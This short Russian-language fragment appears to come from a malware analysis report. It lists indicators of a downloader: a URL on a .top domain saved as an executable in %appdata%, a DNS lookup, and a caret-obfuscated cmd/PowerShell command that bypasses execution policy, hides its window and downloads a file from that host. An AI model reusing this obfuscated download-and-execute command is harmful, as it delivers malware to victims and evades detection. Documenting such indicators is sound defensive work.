Техническая информация
- http://vvorootad.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWER^s^h^eL^l.^eX^E -^Ex^Ec^uti^oN^p^o^L^I^C^y^ ^ByPASS^ -nO^pR^OFiL^e -^Win^DoW^St^YLe^ hiDdEN (^nEw-ObJEc^t ^sys^t^e^m.nE^T.wEBc^l^ieNT^).D^O^WNl^oAd^fi^le^(^'http://vvo...
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /C "PoWER^s^h^eL^l.^eX^E -^Ex^Ec^uti^oN^p^o^L^I^C^y^ ^ByPASS^ -nO^pR^OFiL^e -^Win^DoW^St^YLe^ hiDdEN (^nEw-ObJEc^t ^sys^t^e^m.nE^T.wEBc^l^ieNT^).D^O^WNl^oAd^fi^le^(^'http://vvo...' (со скрытым окном)